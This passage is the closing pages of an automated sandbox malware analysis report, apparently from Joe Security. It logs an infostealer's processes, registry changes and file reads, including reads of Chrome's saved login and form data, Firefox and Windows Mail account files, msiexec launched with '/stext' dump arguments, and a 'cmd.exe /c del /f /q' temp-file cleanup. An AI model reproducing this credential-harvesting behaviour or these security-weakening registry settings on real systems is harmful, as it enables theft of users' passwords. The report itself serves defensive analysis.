30
.n.A34627C4E..00.48A0462sC4E0000F48A04623C4E0000F48A04623C4E.000H+.O0.?...5...dX/G.1B[Q@R..&Q^ _2.Z$.FC\.*Zet.c.+[\$.9;8.C4E0000...a...A...6...C.K-2...An<#6...C.K,2...A..m6...C..q2...A...6...C.b,2...A..!6...C.c+2...A.."6...C.][)...A3C4E0000.q8A|532B...000
success or wait 1 383263 WriteFile
File Path Offset Length Completion CountSourceAddress Symbol
C:\Users\user\AppData\Roaming\F48A04623C4E0000\LOL_DLL.dll unknown 65536 success or wait 2 FA135A ReadFile
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\user.js unknown 0 success or wait 1 383B3A ReadFile
C:\Users\user~1\AppData\Local\Temp\F48A04623C4E000032 unknown 517120 success or wait 1 383D43 ReadFile
File ReadFile Read
Copyright Joe Security LLC 2018 Page 145 of 149
Key Path Name Type Data Completion CountSourceAddress Symbol
HKEY_USERS\Software\Microsoft\Internet Explorer\Main
TabProcGrowth dword 0 success or wait 1 383C4B RegSetValueExA
HKEY_USERS\Software\Microsoft\Internet Explorer\Main
NoProtectedModeBanner dword 1 success or wait 1 383C6B RegSetValueExA
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
2500 dword 3 success or wait 1 383CB4 RegSetValueExA
Key Path Name Type Old Data New Data Completion CountSourceAddress Symbol
File ActivitiesFile Activities
Start time: 14:49:46
Start date: 07/05/2018
Path: C:\Windows\System32\dllhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\dllhost.exe
Imagebase: 0x390000
File size: 7168 bytes
MD5 hash: A63DC5C2EA944E6657203E0C8EDEAF61
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
File Path Access Attributes Options Completion CountSourceAddress Symbol
C:\Users\user\AppData\Roaming\F48A04623C4E0000 read data or list directory and synchronize
normal directory file and synchronous io non alert and open for backup ident and open reparse point
object name collision 1 A685A CreateDirectoryA
C:\Users\user\AppData\Roaming\F48A04623C4E0000 read data or list directory and synchronize
normal directory file and synchronous io non alert and open for backup ident and open reparse point
object name collision 1 A685A CreateDirectoryA
C:\Users\user~1\AppData\Local\Temp\_pE73F.tmp read attributes and synchronize and generic read
normal synchronous io non alert and non directory file
success or wait 1 ACDBB GetTempFileNameA
C:\Users\user~1\AppData\Local\Temp\_pE740.tmp read attributes and synchronize and generic read
normal synchronous io non alert and non directory file
success or wait 1 ACDBB GetTempFileNameA
C:\Users\user\AppData\Roaming\F48A04623C4E0000 read data or list directory and synchronize
normal directory file and synchronous io non alert and open for backup ident and open reparse point
object name collision 52 A685A CreateDirectoryA
File Path Completion CountSourceAddress Symbol
C:\Users\user~1\AppData\Local\Temp\F48A04623C4E0000 success or wait 1 A86C2 DeleteFileA
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Key Value CreatedKey Value Created
Analysis Process: dllhost.exe PID: 2032 Parent PID: 3964Analysis Process: dllhost.exe PID: 2032 Parent PID: 3964
General
File CreatedFile Created
File DeletedFile Deleted
File ReadFile Read
Copyright Joe Security LLC 2018 Page 146 of 149
Registry ActivitiesRegistry Activities
File Path Offset Length Completion CountSourceAddress Symbol
C:\Users\user~1\AppData\Local\Temp\F48A04623C4E000032 unknown 517120 success or wait 1 A71C6 ReadFile
C:\Users\user~1\AppData\Local\Temp\F48A04623C4E0000 unknown 49 success or wait 1 A86AE ReadFile
Key Path Name Type Old Data New Data Completion CountSourceAddress Symbol
Start time: 14:49:47
Start date: 07/05/2018
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd.exe /c del /f /q %temp%\gif*
Imagebase: 0x4aae0000
File size: 302592 bytes
MD5 hash: AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
File ActivitiesFile Activities
Start time: 14:49:53
Start date: 07/05/2018
Path: C:\Windows\System32\msiexec.exe
Wow64 process (32bit): false
Commandline: '' /stext 'C:\Users\user~1\AppData\Local\Temp\_pE740.tmp'
Imagebase: 0x6b0000
File size: 73216 bytes
MD5 hash: 4315D6ECAE85024A0567DF2CB253B7B0
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
File Path Access Attributes Options Completion CountSourceAddress Symbol
C:\Users\user~1\AppData\Local\Temp\bhv57BC.tmp read attributes and synchronize and generic read
normal synchronous io non alert and non directory file
success or wait 1 407ACF GetTempFileNameW
File Path Completion CountSourceAddress Symbol
C:\Users\user~1\AppData\Local\Temp\bhv57BC.tmp success or wait 1 4097C0 DeleteFileW
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Analysis Process: cmd.exe PID: 1036 Parent PID: 2032Analysis Process: cmd.exe PID: 1036 Parent PID: 2032
General
Analysis Process: msiexec.exe PID: 1916 Parent PID: 2032Analysis Process: msiexec.exe PID: 1916 Parent PID: 2032
General
File CreatedFile Created
File DeletedFile Deleted
File WrittenFile Written
Copyright Joe Security LLC 2018 Page 147 of 149
C:\Users\user~1\AppData\Local\Temp\bhv57BC.tmp unknown 21037056 29 6a 0a 15 ef cd ab 89 20 06 00 00 00 00 00 00 fe 88 00 00 00 00 00 00 f1 ae 02 00 24 08 07 1a 07 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 6c 00 fa 01 12 00 00 00 04 34 09 1c 09 75 01 00 13 35 09 1c 09 75 01 00 dd 00 fb 01 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 2c a2 02 00 24 08 07 1a 07 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 00 00 06 00 00 00 01 00 00 00 b1 1d 00 00 01 00 00 00 11 00 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
)j...... ...................$....t......................l........4...u...5...u..............................,...$....t..............................................................................................*..........................................
success or wait 1 40934B WriteFile
C:\Users\user~1\AppData\Local\Temp\_pE740.tmp unknown 2 ff fe .. success or wait 1 408261 WriteFile
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
File Path Offset Length Completion CountSourceAddress Symbol
C:\Users\user~1\AppData\Local\Temp\bhv57BC.tmp unknown 1024 success or wait 1 408242 ReadFile
C:\Users\user~1\AppData\Local\Temp\bhv57BC.tmp unknown 32768 success or wait 1 408242 ReadFile
C:\Users\user~1\AppData\Local\Temp\bhv57BC.tmp unknown 32768 success or wait 1 408242 ReadFile
C:\Users\user~1\AppData\Local\Temp\bhv57BC.tmp unknown 32768 success or wait 1 408242 ReadFile
C:\Users\user~1\AppData\Local\Temp\bhv57BC.tmp unknown 32768 success or wait 1 408242 ReadFile
C:\Users\user~1\AppData\Local\Temp\bhv57BC.tmp unknown 32768 success or wait 1 408242 ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data unknown 100 success or wait 1 41643E ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data unknown 2048 success or wait 1 41643E ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data unknown 2048 success or wait 1 41643E ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data unknown 2048 success or wait 1 41643E ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data unknown 2048 success or wait 1 41643E ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data unknown 16 success or wait 1 41643E ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data unknown 100 success or wait 1 41643E ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data unknown 2048 success or wait 1 41643E ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data unknown 16 success or wait 1 41643E ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data unknown 2048 success or wait 1 41643E ReadFile
Start time: 14:49:53
Start date: 07/05/2018
Path: C:\Windows\System32\msiexec.exe
Wow64 process (32bit): false
Commandline: '' /stext 'C:\Users\user~1\AppData\Local\Temp\_pE73F.tmp'
Imagebase: 0x6b0000
File size: 73216 bytes
MD5 hash: 4315D6ECAE85024A0567DF2CB253B7B0
Has administrator privileges: true
Programmed in: C, C++ or other language
File ReadFile Read
Analysis Process: msiexec.exe PID: 2224 Parent PID: 2032Analysis Process: msiexec.exe PID: 2224 Parent PID: 2032
General
Copyright Joe Security LLC 2018 Page 148 of 149
Disassembly
Code Analysis
File ActivitiesFile Activities
Reputation: low
File Path Offset Length Completion CountSourceAddress Symbol
C:\Users\user\AppData\Local\Microsoft\Windows Mail\account{3824098E-E3FA-4A81-AF84-35154F5FAB29}.oeaccount
unknown 670 success or wait 1 406742 ReadFile
C:\Users\user\AppData\Local\Microsoft\Windows Mail\account{3C5A8A00-EFD1-4AB0-AC7C-70794DEA2474}.oeaccount
unknown 1734 success or wait 1 406742 ReadFile
C:\Users\user\AppData\Local\Microsoft\Windows Mail\account{E46164F7-F891-4841-A23E-F0A91618C5A6}.oeaccount
unknown 1506 success or wait 1 406742 ReadFile
Start time: 14:49:53
Start date: 07/05/2018
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x30000
File size: 2972672 bytes
MD5 hash: 6DDCA324434FFA506CF7DC4E51DB7935
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
File ReadFile Read
Analysis Process: explorer.exe PID: 1376 Parent PID: 2032Analysis Process: explorer.exe PID: 1376 Parent PID: 2032
General
Copyright Joe Security LLC 2018 Page 149 of 149